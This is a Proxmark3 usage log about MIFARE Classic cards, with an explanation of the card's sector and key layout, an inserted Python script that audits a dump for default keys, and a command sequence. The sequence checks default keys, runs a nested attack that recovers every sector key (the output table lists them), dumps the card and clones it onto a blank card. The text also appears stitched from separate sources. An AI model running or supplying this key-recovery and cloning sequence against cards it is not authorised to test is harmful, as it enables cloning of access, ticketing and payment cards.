Proxmark3 Usage Log
What is proxmark3
The Proxmark III is a device developed by Jonathan Westhues that enables sniffing, reading and cloning of RFID (Radio Frequency Identification) tags. For my master thesis I wanted to look at the communication of Mifare Classic cards. Mifare Classic is used in many applications and is the most popular contactless card around. It is used in e-ticketing, public transport and access control. The higher-level protocol is kept secret by the manufacturer (NXP). I made an implementation of the ISO14443 type A standard for the Proxmark since Mifare is based on this communication standard.
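What is M1 Card
An M1 card has 16 sectors, numbered 0-15, and each sector has 4 blocks, numbered 0-3, each of which can store 16 bytes. Block 03 of each sector stores KeyA, KeyB and the control bits. Because the M1 card allows each sector to be protected by its own independent pair of keys, operations on the data can be controlled more flexibly; the control bits are the result computed from the sector's detailed permissions. Every M1 card has a globally unique UID, stored in block 00 of sector 00, also called the manufacturer block: the first 4 bytes are the card's UID, the 5th byte is the check byte of the UID, and the rest is manufacturer data. This block is write-protected before the card leaves the factory, so it can only be read, not modified. There are exceptions, of course: a special kind of card called a UID card has no protection on the UID; these are simply cards that the manufacturer did not produce according to the specification.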
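The layout described above can be checked against a card dump. The Python below is an added example, not part of the original log or of the Proxmark project: it verifies the UID check byte, validates the control bits of every sector's block 3 and lists sectors that still use the factory-default key ffffffffffff. It assumes a 1024-byte binary dump with the keys present in each block 3; the function names and the sample dump are constructed for illustration.

```python
# Added example: audit a MIFARE Classic 1K dump (16 sectors x 4 blocks x 16 bytes).
BLOCK, BLOCKS_PER_SECTOR, SECTORS = 16, 4, 16
DEFAULT_KEY = bytes.fromhex("ffffffffffff")

def check_uid(block0: bytes):
    """Return (uid, bcc_ok): bytes 0-3 are the UID, byte 4 is their XOR check byte."""
    uid, bcc = block0[:4], block0[4]
    return uid, (uid[0] ^ uid[1] ^ uid[2] ^ uid[3]) == bcc

def parse_trailer(trailer: bytes):
    """Split block 3 of a sector into Key A, control bits (bytes 6-8) and Key B."""
    key_a, acc, key_b = trailer[0:6], trailer[6:9], trailer[10:16]
    # Each condition nibble is stored twice, once inverted, so corruption is detectable.
    c1, c2, c3 = acc[1] >> 4, acc[2] & 0x0F, acc[2] >> 4
    valid = ((acc[0] & 0x0F) == (~c1 & 0x0F) and
             (acc[0] >> 4) == (~c2 & 0x0F) and
             (acc[1] & 0x0F) == (~c3 & 0x0F))
    # Bit n of c1/c2/c3 together form the 3-bit access condition of block n.
    conds = [f"{(c1 >> n) & 1}{(c2 >> n) & 1}{(c3 >> n) & 1}" for n in range(4)]
    return key_a, key_b, conds, valid

def audit(dump: bytes):
    """Return (uid, bcc_ok, findings) where findings is a list of (sector, issue)."""
    if len(dump) != BLOCK * BLOCKS_PER_SECTOR * SECTORS:
        raise ValueError("expected a 1024-byte MIFARE Classic 1K dump")
    uid, bcc_ok = check_uid(dump[:BLOCK])
    findings = []
    for s in range(SECTORS):
        off = (s * BLOCKS_PER_SECTOR + 3) * BLOCK
        key_a, key_b, conds, valid = parse_trailer(dump[off:off + BLOCK])
        if not valid:
            findings.append((s, "control bits inconsistent"))
        if DEFAULT_KEY in (key_a, key_b):
            findings.append((s, "factory-default key"))
    return uid, bcc_ok, findings

def sample_dump() -> bytes:
    """Constructed sample: default block 3 everywhere, custom keys in sector 2."""
    trailer = DEFAULT_KEY + bytes.fromhex("ff078069") + DEFAULT_KEY
    dump = bytearray((bytes(48) + trailer) * SECTORS)
    dump[0:5] = bytes.fromhex("01020304") + bytes([0x01 ^ 0x02 ^ 0x03 ^ 0x04])
    dump[2 * 64 + 48:2 * 64 + 64] = bytes.fromhex("a0a1a2a3a4a5" "ff078069" "b0b1b2b3b4b5")
    return bytes(dump)

if __name__ == "__main__":
    uid, bcc_ok, findings = audit(sample_dump())
    print(uid.hex(), "BCC ok" if bcc_ok else "BCC mismatch")
    for sector, issue in findings:
        print(f"sector {sector:02d}: {issue}")
```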
Logs
// Check the antenna's working status and frequency
proxmark3> hw tune
// Read the card according to the 14a standard
proxmark3> hf 14a reader
// Test the existing sectors with the default keys
proxmark3> hf mf chk *1 ? t
// Use the default key of block 7 to sniff out a key
proxmark3> hf mf nested o 0x07 1 ffffffffffff 1 A
// Use the sniffed key to dump the keys of all sectors
proxmark3> hf mf nested 1 0 A c5f2251a1111 d
|---|----------------|---|----------------|---|
|sec|key A |res|key B |res|
|---|----------------|---|----------------|---|
|000| bf1ebb3a1111 | 1 | bf1ebb3a1111 | 1 |
|001| ffffffffffff | 1 | ffffffffffff | 1 |
|002| 201409032014 | 1 | ef53cad2923f | 1 |
|003| 201409032014 | 1 | ef53cad2923f | 1 |
|004| ffffffffffff | 1 | ffffffffffff | 1 |
|005| ffffffffffff | 1 | ffffffffffff | 1 |
|006| ffffffffffff | 1 | ffffffffffff | 1 |
|007| ffffffffffff | 1 | ffffffffffff | 1 |
|008| 863ffa384048 | 1 | 1834746affe8 | 1 |
|009| 863ffa384048 | 1 | 1834746affe8 | 1 |
|010| ffffffffffff | 1 | ffffffffffff | 1 |
|011| ffffffffffff | 1 | ffffffffffff | 1 |
|012| ffffffffffff | 1 | ffffffffffff | 1 |
|013| ffffffffffff | 1 | ffffffffffff | 1 |
|014| ffffffffffff | 1 | ffffffffffff | 1 |
|015| 201409032014 | 1 | ef53cad2923f | 1 |
|---|----------------|---|----------------|---|
Printing keys to bynary file dumpkeys.bin...
// Use dumpkeys.bin to read the encrypted data on the card
proxmark3> hf mf dump
|-----------------------------------------|
|------ Reading sector access bits...-----|
|-----------------------------------------|
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
exit
do something here...
// Convert the data for cloning the card
python pm3_mfd2eml.py dumpdata.bin test.eml
// Clone the data to a new card
proxmark3> hf mf cload test